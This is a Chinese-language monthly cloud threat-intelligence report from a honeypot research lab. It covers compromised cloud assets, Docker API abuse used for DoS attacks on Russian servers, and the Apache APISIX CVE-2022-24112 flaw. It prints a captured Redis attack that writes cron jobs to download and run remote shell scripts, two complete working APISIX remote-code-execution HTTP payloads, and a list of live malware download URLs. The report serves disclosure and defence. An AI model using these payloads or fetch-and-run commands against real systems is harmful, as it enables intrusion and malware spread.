公有云网络安全威胁情报(202202)
Share this

公有云网络安全威胁情报(202202)

1. 概述

  • 17个云上重点资产有漏洞攻击行为,包括某民主党派市级委员会、某县级中医院等云上重点单位。

  • 随着俄乌冲突全面升级,我们发现有攻击者利用Docker Remote API未授权访问漏洞,对俄罗斯境内服务器发起拒绝服务(DoS)网络攻击。

  • Apache APISIX本月爆出远程代码执行漏洞(CVE-2022-24112),攻击者通过两种攻击方式可远程执行恶意代码。

本文主要通过360网络安全研究院 Anglerfish蜜罐视角,分析云上热门漏洞攻击细节,以及云上重要资产在公网上发起攻击的情况。

2. 云上资产对外扫描攻击

2月份我们共发现17个命中蜜罐节点的重要单位的云上资产,下表为其中一部分案例,如果需要更多相关资料,请根据文末的联系方式与我们联系。

IP地址 云服务商 单位名称 所属行业 IP所在省份 漏洞利用 扫描协议
39.105.204.* 阿里云 中国****市委员会 政府机关 北京 Redis RCE Redis
39.105.159.* 阿里云 **县中医医院 事业单位 北京 SSH暴力破解 HTTP
SSH
139.159.180.* 华为云 **市**区人民政府**街道办事处 政府机关 广东 Telnet暴力破解
Gpon Router GponForm RCE
ThinkPHP RCE
Linksys Router unblock RCE
HTTP
Telnet

从行业分布看,在已知行业的重点IP中,事业单位占比最大达80%,其他还包括政府机关和国企。

位于北京的阿里云IP 39.105.204.*,属于某市民主党派委员会,在2月初春节期间一直有Redis扫描和漏洞利用的行为。

*1
$7
COMMAND
*4
$6
config
$3
set
$10
dbfilename
$9
backup.db
*1
$4
save
*4
$6
config
$3
set
$27
stop-writes-on-bgsave-error
$2
no
*1
$8
flushall
*3
$3
set
$7
backup1
$69

*/2 * * * * cd1 -fsSL http://195.58.38.171/cleanfda/init.sh | sh

*3
$3
set
$7
backup2
$71

*/3 * * * * wget -q -O- http://195.58.38.171/cleanfda/init.sh | sh

*3
$3
set
$7
backup3
$72

*/4 * * * * curl -fsSL http://195.242.111.238/cleanfda/init.sh | sh

访问该IP地址对应的域名可以进入网页:

另一个阿里云IP地址为39.105.159.*,属于某县级中医院。通过对应域名可以访问医院的主页。

这个IP发起了大量SSH暴力破解攻击:

{"username": "root", "version": "SSH-2.0-Go", "type": "ssh", "password": "qwertyui1", "hassh": "01ca35584ad5a1b66cf6a9846b5b2821", "exec_channel": "echo -e \"\\x6F\\x6B\""}

3. 云上热门漏洞攻击

3.1 利用Docker Remote API未授权访问漏洞对俄罗斯发起网络攻击

近期,俄乌局势紧张,冲突也蔓延至网络空间。2月下旬,蜜罐系统捕获到有攻击者利用Docker Remote API未授权访问漏洞在受害设备上部署名为“abagayev/stop-russia”的GitHub开源镜像,利用受害设备发起针对俄罗斯境内服务器的拒绝服务(DoS)网络攻击。

关于Docker Remote API未授权访问漏洞的利用方法,我们在上月报告中已经做了较为详细的说明。

我们在本地部署镜像后监测到攻击行为:

在开源项目的这个页面,列出了所有俄罗斯网站攻击目标。

3.2 Apache APISIX batch-requests 远程代码执行漏洞(CVE-2022-24112)

漏洞信息

涉及产品及版本: Apache APISIX <2.10.4 / <2.12.1
CVE: CVE-2022-24112
披露日期: 2022年2月11日
CVSS 3.X 评分: 9.8
影响设备量级: 十万级

目前,该漏洞主要攻击TCP/9000和TCP/9080端口,PoC和技术细节已经公开。

蜜罐系统在2月17日首次捕获到对插件/apisix/batch-requests的访问,2月22日首次捕获到该漏洞的攻击数据包。2月份共捕获到该漏洞的云服务器攻击源IP 23个,其中亚马逊AWS最多。

攻击方式

通过 REST Admin API 可以控制 Apache APISIX,但是,Admin API默认只允许127.0.0.1访问。这个漏洞允许攻击者通过默认开启的batch-requests插件的X-Real-IP参数绕过IP地址限制。

使用默认的API key通过该插件发送添加路由请求时,可通过filter_func(用户自定义的过滤函数,用来匹配规则)和script(在HTTP请求/响应周期中执行的脚本)两种方法在路由中写入恶意代码,导致远程代码执行漏洞。

方法1:通过filter_func方式的攻击Payload:

POST /apisix/batch-requests HTTP/1.1
Host: {target}
Content-Length: 454

{"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl 192.168.19.128:1234'); return true end\"}"}]}

方法2:通过script方式的攻击Payload:

POST /apisix/batch-requests HTTP/1.1
Host: {target}
Content-Length: 421

{"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"script\": \"os.execute('curl 192.168.19.128:1234')\"}"}]}

我们在本地做了该漏洞的复现,方法1需再次请求设置的URL才可以触发代码执行;方法2可直接触发代码执行,不需要发送二次请求。

2月23日开始,已有恶意软件利用漏洞传播,传播趋势如下图所示。

4. 云服务器攻击总体情况

2022年2月,360网络安全研究院 Anglerfish蜜罐系统监测到的云服务器源IP 386170个,其中漏洞扫描和攻击的IP 14072个,传播恶意软件的IP 4242个,进行密码爆破攻击的IP 4535个。

从云服务商的情况看,本月IP数量前5的云服务商仍然是腾讯云、DigitalOcean、阿里云、亚马逊AWS和微软Azure。

从漏洞来看,上月活跃的Docker Remote API未授权访问漏洞、美国飞塔(Fortinet)FortiOS未授权任意文件读取漏洞等在本月仍然较为活跃。GitLab、ISPY的相关漏洞本月活跃IP数量较上月有较多增长。

在恶意软件方面,本月木马下载器类(TrojanDownloader)的传播IP数量超过了恶意挖矿类(CoinMiner)恶意软件。

阿里云、腾讯云是传播恶意软件的攻击源IP最多的两家云服务商。

oracle.zzhreceive.top仍然是被最多IP使用的下载服务器,head.17kbx.net和payload.krakenbit.net相比上月使用的IP数量有明显的增加。

密码爆破攻击方面,87%的攻击源IP集中在SSH协议的密码爆破上,SSH仍然是受到爆破攻击最多的协议。腾讯云是攻击源IP最多的云服务商,提供了超过4000个IP。DigitalOcean和亚马逊AWS排在二三位。

5. 防护建议

针对本月新出现的Apache APISIX batch-requests远程代码执行漏洞(CVE-2022-24112),云上用户可做好以下防护措施:
1.在conf/config.yaml修改默认的admin_key,或者注释掉conf/config-default.yaml中的batch-requests;
2.更新到最新版本 2.10.4 或者 2.12.1。

6. 联系我们

感兴趣的读者,可以通过邮箱netlab[at]360.cn联系我们。

7. IoC List

URL:

http://107.172.249.169/Ugliest.mpsl
http://107.172.249.169/Ugliest.mips
http://107.172.249.169/Ugliest.arm6
http://96.8.121.110/The420SmokePlace.dns/KKveTTgaAAsecNNaaaa.mips
http://96.8.121.110/The420SmokePlace.dns/KKveTTgaAAsecNNaaaa.i486
http://96.8.121.110/The420SmokePlace.dns/KKveTTgaAAsecNNaaaa.m68k
http://107.172.89.142/lx/apep.arm
http://46.101.183.162/eski/.x/juice
http://172.245.186.149/Acid.x86
http://drpelvicpain.com/dr/nano.jpg
http://107.172.89.142/z.sh

md5:

551341b7f4b547bdc2090f0f40f0cb43
c49271194f775e7fe66e3470b713f0c1
f787a3971619ec278c71f4b1eb88a555
850da4f2e67510e609f9b4db7dd7c8ed
200ea7427ffd18591c6535f67f167acc
a7de7cb5eff5f8ced23efe7eba90c33f
a67799c49ffee34b3467e7714a5abd86
4225d7b11dd787288e3edceab34fc43c
b0783f33954493b1a4ad60eff5eb457a
e956afe0cef4686de6829dcc08f3d46f
cf74569c199d630b49c5d363ae9231b6